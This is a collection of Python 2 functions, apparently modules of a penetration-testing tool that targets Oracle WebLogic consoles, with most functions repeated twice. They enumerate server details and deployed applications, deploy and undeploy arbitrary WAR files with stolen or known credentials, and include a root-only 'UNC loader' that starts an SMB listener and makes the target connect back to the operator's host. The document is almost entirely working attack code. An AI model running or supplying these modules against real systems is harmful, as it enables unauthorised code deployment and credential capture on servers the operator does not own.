def run(self, fingerengine, fingerprint): cookies = checkAuth(fingerengine.options.ip, fingerprint) if not cookies[0]: utility.Msg("This module requires valid credentials.", LOG.ERROR) return utility.Msg("Attempting to retrieve WebLogic info...") base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) if fingerprint.title is WINTERFACES.WLS: base = base.replace('http', 'https') server_name = self.fetchServerName(base, cookies[0]) uri = "/console/console.portal?_nfpb=true&_pageLabel=ServerMonitoringTabmonitoringTabPage&"\ "handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3D{0}"\ "%2CType%3DServer%22%29".format(server_name) response = utility.requests_get(base + uri, cookies=cookies[0]) if response.status_code == 200: tags = findall("class=\"likeLabel\">(.*?):</span>", response.content) values = findall("class=\"inputFieldRO\"><div>(.*?)</div>", response.content.replace('\r\n', '')) if len(tags) > 0: for (key, value) in zip(tags, values): utility.Msg(" %s: %s" % (key, value)) else: utility.Msg( "Unable to fetch server '%s' information (HTTP %d)" % (server_name, response.status_code), LOG.ERROR)
def run(self, fingerengine, fingerprint): (usr, pswd) = checkAuth(fingerengine.options.ip, fingerprint) if not usr or not pswd: utility.Msg("This module requires valid credentials.", LOG.ERROR) return utility.Msg("Obtaining deployed applications...") try: args = [ "./list_apps.sh", fingerengine.options.ip, str(fingerprint.port), usr, pswd ] if fingerprint.title is WINTERFACES.WLS: args.append('ssl') res = check_output(args, cwd='./src/lib/weblogic/list_apps') if type(res) is str: if "There is no application to list" in res: utility.Msg("No applications found deployed.") else: output = res.split('\n')[1:-2] for app in output: if "<Notice>" in app: continue utility.Msg("App found: %s" % app.lstrip()) else: utility.Msg("Error fetching applications", LOG.ERROR) utility.Msg(res.output, LOG.DEBUG) except Exception, e: utility.Msg(e, LOG.DEBUG)
def run(self, fingerengine, fingerprint): cookies = checkAuth(fingerengine.options.ip, fingerprint) if not cookies[0]: utility.Msg("This module requires valid credentials.", LOG.ERROR) return utility.Msg("Obtaining deployed applications...") base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) uri = "/console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage" if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") response = utility.requests_get(base + uri, cookies=cookies[0]) if response.status_code == 200: data = findall(r"title=\"Select (.*?)\"", response.content) if len(data) > 0: for entry in data: utility.Msg("App found: %s" % entry) else: utility.Msg("No applications found.")
def deploy(fingerengine, fingerprint): """ Standard deployer over T3 protocol. The listed versions above are the only ones that have been tested, but this likely works back to early versions of 10.x, and perhaps even BEA days (8.x/9.x) """ (usr, pswd) = checkAuth(fingerengine.options.ip, fingerprint) war_file = abspath(fingerengine.options.deploy) if not usr or not pswd: utility.Msg("WebLogic deployer requires valid credentials.", LOG.ERROR) return utility.Msg("Preparing to deploy {0}...".format(war_file)) response = wlweb_deploy(fingerengine.options.ip, fingerprint, war_file, usr, pswd) if type(response) is str and "deploy completed on Server" in response: utility.Msg("{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) elif "is already being used" in response.output: utility.Msg("{0} appears to already be deployed.".format(war_file), LOG.ERROR) else: utility.Msg("Error deploying to server.", LOG.ERROR) utility.Msg(response.output, LOG.DEBUG)
def run(self, fingerengine, fingerprint): cookies = checkAuth(fingerengine.options.ip, fingerprint) if not cookies[0]: utility.Msg("This module requires valid credentials.", LOG.ERROR) return utility.Msg("Attempting to retrieve WebLogic info...") base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) if fingerprint.title is WINTERFACES.WLS: base = base.replace('http', 'https') server_name = self.fetchServerName(base, cookies[0]) uri = "/console/console.portal?_nfpb=true&_pageLabel=ServerMonitoringTabmonitoringTabPage&"\ "handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3D{0}"\ "%2CType%3DServer%22%29".format(server_name) response = utility.requests_get(base + uri, cookies=cookies[0]) if response.status_code == 200: tags = findall("class=\"likeLabel\">(.*?):</span>", response.content) values = findall("class=\"inputFieldRO\"><div>(.*?)</div>", response.content.replace('\r\n', '')) if len(tags) > 0: for (key, value) in zip(tags, values): utility.Msg(" %s: %s" % (key, value)) else: utility.Msg("Unable to fetch server '%s' information (HTTP %d)" % (server_name, response.status_code), LOG.ERROR)
def run(self, fingerengine, fingerprint): (usr, pswd) = checkAuth(fingerengine.options.ip, fingerprint) if not usr or not pswd: utility.Msg("This module requires valid credentials.", LOG.ERROR) return utility.Msg("Obtaining deployed applications...") try: args = ["./list_apps.sh", fingerengine.options.ip, str(fingerprint.port), usr, pswd] if fingerprint.title is WINTERFACES.WLS: args.append('ssl') res = check_output(args, cwd='./src/lib/weblogic/list_apps') if type(res) is str: if "There is no application to list" in res: utility.Msg("No applications found deployed.") else: output = res.split('\n')[1:-2] for app in output: if "<Notice>" in app: continue utility.Msg("App found: %s" % app.lstrip()) else: utility.Msg("Error fetching applications", LOG.ERROR) utility.Msg(res.output, LOG.DEBUG) except Exception, e: utility.Msg(e, LOG.DEBUG)
def run(self, fingerengine, fingerprint): """ Same as JBoss/Tomcat """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\ '=/com/bea/console/actions/app/install/appSelected' data = { "AppApplicationInstallPortletselectedAppPath": "\\\\{0}\\fdas.war".format(utility.local_address()), "AppApplicationInstallPortletfrsc": None } if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") utility.Msg( "Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint) if cookies[0]: utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() # fetch our CSRF data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF( base, cookies[0]) utility.Msg("Invoking UNC loader...") try: _ = utility.requests_post(base + uri, data=data, cookies=cookies[0], timeout=1.0) except: # we dont care about the response here pass else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin sleep(1) self._Listen = False
def run(self, fingerengine, fingerprint): """ Same as JBoss/Tomcat """ if getuid() > 0: utility.Msg("Root privs required for this module.", LOG.ERROR) return base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\ '=/com/bea/console/actions/app/install/appSelected' data = { "AppApplicationInstallPortletselectedAppPath" : "\\\\{0}\\fdas.war".format(utility.local_address()), "AppApplicationInstallPortletfrsc" : None } if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") utility.Msg("Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint) if cookies[0]: utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() # fetch our CSRF data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(base, cookies[0]) utility.Msg("Invoking UNC loader...") try: _ = utility.requests_post(base+uri, data=data, cookies=cookies[0], timeout=1.0) except: # we dont care about the response here pass else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin sleep(1) self._Listen = False
def undeploy(fingerengine, fingerprint): """ Undeploy a deployed application from the remote WL server """ app = fingerengine.options.undeploy # ensure it ends with war app = app if '.war' in app else app + '.war' base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") uri = "/console/console.portal?AppApplicationUninstallPortletreturnTo="\ "AppAppApp&AppDeploymentsControlPortlethandler="\ "com.bea.console.handles.JMXHandle(\"com.bea:Name=mydomain,Type=Domain\")" data = { "all" : "on", "AppApplicationUninstallPortletchosenContents" : "com.bea.console.handles.AppDeploymentHandle%28%22com.bea"\ "%3AName%3D{0}%2CType%3DAppDeployment%22%29".format(app), "_pageLabel" : "AppApplicationUninstallPage", "_nfpb" : "true", "AppApplicationUninstallPortletfrsc" : None } utility.Msg( "Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint, True) if cookies[0]: data['AppApplicationUninstallPortletfrsc'] = fetchCSRF( base, cookies[0]) try: utility.requests_post(base + uri, data=data, cookies=cookies[0], timeout=1.0) except exceptions.Timeout: utility.Msg("{0} undeployed.".format(app), LOG.SUCCESS) else: utility.Msg("Failed to undeploy {0}".format(app), LOG.ERROR) else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
def run(self, fingerengine, fingerprint): # MBean types; tuples of (type, (start,end)) where start/end are # list values to start/stop parsing at. Temporary hack until I # can figure out if i can pull multiple properties in a single # request mbeans = [("JVMRuntime", (2, 15)), ("ServerRuntime", (2, 18))] (usr, pswd) = checkAuth(fingerengine.options.ip, fingerprint) if not usr or not pswd: utility.Msg("This module requires valid credentials.", LOG.ERROR) return utility.Msg("Attempting to retrieve WebLogic info...") try: args = [ "./gettype.sh", fingerengine.options.ip, str(fingerprint.port), usr, pswd ] for mbean in mbeans: targs = copy(args) targs.append(mbean[0]) if fingerprint.title is WINTERFACES.WLS: targs.append("ssl") res = check_output(targs, cwd="./src/lib/weblogic/getinfo") if "<Notice>" in res: # get around some buggy output in WL with SSL res = '\n'.join(res.split('\n')[1:]) if type(res) is str and len(res) > 1: for entry in res.split('\n')[mbean[1][0]:mbean[1][1]]: utility.Msg(entry) else: utility.Msg("Error fetching info (%s)" % jvmr, LOG.ERROR) utility.Msg(res.output, LOG.DEBUG) except Exception, e: utility.Msg(e, LOG.DEBUG)
def run(self, fingerengine, fingerprint): # MBean types; tuples of (type, (start,end)) where start/end are # list values to start/stop parsing at. Temporary hack until I # can figure out if i can pull multiple properties in a single # request mbeans = [("JVMRuntime", (2,15)), ("ServerRuntime", (2,18))] (usr, pswd) = checkAuth(fingerengine.options.ip, fingerprint) if not usr or not pswd: utility.Msg("This module requires valid credentials.", LOG.ERROR) return utility.Msg("Attempting to retrieve WebLogic info...") try: args = ["./gettype.sh", fingerengine.options.ip, str(fingerprint.port), usr, pswd] for mbean in mbeans: targs = copy(args) targs.append(mbean[0]) if fingerprint.title is WINTERFACES.WLS: targs.append("ssl") res = check_output(targs, cwd="./src/lib/weblogic/getinfo") if "<Notice>" in res: # get around some buggy output in WL with SSL res = '\n'.join(res.split('\n')[1:]) if type(res) is str and len(res) > 1: for entry in res.split('\n')[mbean[1][0]:mbean[1][1]]: utility.Msg(entry) else: utility.Msg("Error fetching info (%s)" % jvmr, LOG.ERROR) utility.Msg(res.output, LOG.DEBUG) except Exception, e: utility.Msg(e, LOG.DEBUG)
def undeploy(fingerengine, fingerprint): """ Undeploy a deployed application from the remote WL server """ app = fingerengine.options.undeploy # ensure it ends with war app = app if '.war' in app else app + '.war' base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") uri = "/console/console.portal?AppApplicationUninstallPortletreturnTo="\ "AppAppApp&AppDeploymentsControlPortlethandler="\ "com.bea.console.handles.JMXHandle(\"com.bea:Name=mydomain,Type=Domain\")" data = { "all" : "on", "AppApplicationUninstallPortletchosenContents" : "com.bea.console.handles.AppDeploymentHandle%28%22com.bea"\ "%3AName%3D{0}%2CType%3DAppDeployment%22%29".format(app), "_pageLabel" : "AppApplicationUninstallPage", "_nfpb" : "true", "AppApplicationUninstallPortletfrsc" : None } utility.Msg("Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint, True) if cookies[0]: data['AppApplicationUninstallPortletfrsc'] = fetchCSRF(base, cookies[0]) try: utility.requests_post(base + uri, data=data, cookies=cookies[0], timeout=1.0) except exceptions.Timeout: utility.Msg("{0} undeployed.".format(app), LOG.SUCCESS) else: utility.Msg("Failed to undeploy {0}".format(app), LOG.ERROR) else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
def deploy(fingerengine, fingerprint): """ Multistage process of uploading via the web interface; not as neat as using the CLI tool, but now we don't need to rely on any enormous libraries. """ cookies = checkAuth(fingerengine.options.ip, fingerprint) war_file = abspath(fingerengine.options.deploy) war_name = parse_war_path(war_file, True) if not cookies[0]: utility.Msg("This module requires valid credentials.", LOG.ERROR) return utility.Msg("Preparing to deploy {0}..".format(war_name)) base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") # first step is to upload the application uri = "/console/console.portal?AppApplicationInstallPortlet_actionOverride="\ "/com/bea/console/actions/app/install/uploadApp" files = OrderedDict([ ('AppApplicationInstallPortletuploadAppPath', (war_name, open(war_file, "rb"))), ('AppApplicationInstallPortletuploadPlanPath', ('')) ]) csrf_token = fetchCSRF(cookies, base) data = { "AppApplicationInstallPortletfrsc" : csrf_token} response = utility.requests_post(base + uri, files=files, cookies=cookies[0], data = data) if response.status_code is not 200: utility.Msg("Failed to upload (HTTP %d)" % response.status_code) return utility.Msg("Upload successful, deploying...") # second step is to select the recently uploaded app and set path path = findall('name="AppApplicationInstallPortletselectedAppPath" id="formFC1"'\ ' size="64" value="(.*?)">', response.content)[0] uri = "/console/console.portal?AppApplicationInstallPortlet_actionOverride"\ "=/com/bea/console/actions/app/install/appSelected" data = { "AppApplicationInstallPortletselectedAppPath" : path, "AppApplicationInstallPortletfrsc" : csrf_token } response = utility.requests_post(base + uri, cookies=cookies[0], data=data) if response.status_code is not 200: utility.Msg("Failed to set selected path (HTTP %d)" % response.status_code, LOG.ERROR) return # third step is set the target type, which is by default Application uri = "/console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/"\ "bea/console/actions/app/install/targetStyleSelected" data = { "AppApplicationInstallPortlettargetStyle" : "Application", "AppApplicationInstallPortletfrsc" : csrf_token } response = utility.requests_post(base + uri, cookies=cookies[0], data=data) if response.status_code is not 200: utility.Msg("Failed to set type (HTTP %d)" % response.status_code, LOG.ERROR) return # final step; deploy it uri = "/console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/"\ "bea/console/actions/app/install/finish" data = {"AppApplicationInstallPortletname" : war_name, "AppApplicationInstallPortletsecurityModel" : "DDOnly", "AppApplicationInstallPortletstagingStyle" : "Default", "AppApplicationInstallPortletplanStagingStyle" : "Default", "AppApplicationInstallPortletfrsc" : csrf_token } try: response = utility.requests_post(base + uri, cookies=cookies[0], data=data) except: pass else: utility.Msg("Failed to finish deploy (HTTP %d)" % response.status_code, LOG.ERROR) return utility.Msg("{0} deployed at /{0}/".format(war_name), LOG.SUCCESS)